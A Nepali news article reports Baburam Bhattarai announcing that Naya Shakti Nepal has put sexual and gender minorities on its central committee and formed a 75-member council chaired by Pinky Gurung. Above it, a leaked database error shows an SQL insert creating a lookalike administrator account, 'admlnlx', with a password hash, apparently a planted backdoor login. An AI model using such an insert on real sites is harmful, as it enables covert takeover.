WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BZSbMrGzmCzL3tXDW61lgCVwPc7LV6/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-22 21:37:30', '', 'admlnlx', 'admlnlx')
काठमाडौं,माघ २२ –
नयाँ शक्ति नेपालका संयोजक डा. बाबुराम भट्राइले नेपालको इतिहासमा पहिलो पटक यौनिक तथा लैगिक अल्पंख्यकलाई आफ्नो पार्टीको केन्द्रिय समितिमा राखिएको बताएका छन् ।
यौनिक तथा लैगिक अल्पसंख्यकलाई कुनै पनि पार्टीले अहिलेसम्म केन्द्रिय समितिमा समावेश नगरेको दाबी गर्दै उनले नयाँ शक्ति नेपालले तेस्रोलिंगी पिंकी गुरुङलाई पार्टी केन्द्रिय परिषद सदस्य बनाएको भन्दै यसलाई उपयोग गरेर आफ्नो अधिकारका लागि संघर्ष गर्न सुझाव समेत दिए ।
“अहिले पनि राज्य सत्तामा रहेका कतिपय व्यक्तिले यौनिक अल्पसंख्यकलाई नबुझी विभेद गरिरहेका छन् । यौनिक अल्पसंख्यकलाई नबुझ्ने चाँही वास्तवमा नबुझ्ने व्यक्ति हो,” नयाँ शक्ति नेपाल पार्टी अन्तरगत यौनिक तथा लैगिक अल्पसंख्यक समुदाय केन्द्रिय परिषद गठन कार्यक्रमको शनिबार राजधानीमा उद्घाटन सत्रलाई संवोधन गर्दै डा। भट्टराइले भने, “समलिंगी तेस्रोलिंगीलाई स्वीकार गरेर उनीहरुको पहिचान स्थापित गर्नु नै उनीहरुको सच्चा सम्मान हो ।”
समलिंगी तेस्रोलिंगीलाई राज्यका सबै निकायमा समावेश गरेर लैजान संविधानले निर्देश गरिसकेको भन्दै उनले यौनिक अल्पसंख्यकलाई विभेद गर्ने व्यक्ति कानुनको भागिदार बन्ने बताए ।
“इतिहास देखि नै समलिंगी तेस्रोलिंगी थिए । शिखण्डी पनि तेस्रोलिंगी हुन् । १० वर्षे जनयुद्धमा पनि थुप्रै तेस्रोलिंगीले अग्रभागमा रहेर आफ्नो जिम्मेवारी निभाएका थिए,” उनले भने, नयाँ शक्ति यौनिक तथा लैगिक अल्पसंख्यकको अभिभावक हो ।”
यौनिक अल्पसंख्यकलाई आफ्नो पार्टीले राजनीतिक संगठनमा केन्द्रदेखि स्थानीय तहसम्म प्रतिनिधित्व गराउँदै लैजाने आश्वासन दिँदै डा। भट्टराईले अधिकारका लागि संगठनात्मक दबाब नै सबैभन्दा प्रभावकारी माध्यम भएको बताए ।
“पहिचान मात्रै फरक हो, क्षमता सबैको समान हो भनेर अगाडि आउनुस्,” उनले भने, “हामी पार्टीमा प्रतिनिधित्व गराउँछौं, राज्यले पनि त्यैगरी आफ्ना प्रत्यक निकायमा समावेश गराउँदै लैजानेछ ।”
आर्थिक रुपमा सवल नभएसम्म आफ्नो अस्तित्व र पहिचानको सम्मान नहुने भन्दै आर्थिक उपार्जनका लागि कार्यक्रम लिएर आउन आग्रह गर्दै उनले त्यसका लागि आफ्नो पार्टीले सहयोग गर्ने उनको भनाइ छ ।
समलिंगी विवाहले मान्यता पाउनुपर्नेमा उनको जोड छ । संविधानले समान भनिसकेको र अन्य देशले पनि मान्यता दिइसकेको भन्दै डा। भट्राईले यसका लागि संगठनमार्फत अगाडि बढ्न समलिंगी तेस्रोलिंगीलाई सुझाव दिए ।
यसैबीच, नयाँ शक्ति नेपाल पार्टी अन्तरगत यौनिक तथा लैगिक अल्पसंख्यक समुदाय केन्द्रिय परिषद गठन भएको छ । ७५ सदस्य रहेको केन्द्रिय परिषदको अध्यक्षमा पिंकी गुरुङ सर्वसम्मत चुनिएकी छन् ।
केन्द्रिय परिषद अन्तरगत केन्द्रिय समिति, केन्द्रिय सचिवालय, केन्द्रिय कार्यालय, विधान समिति पनि गठन भएको छ ।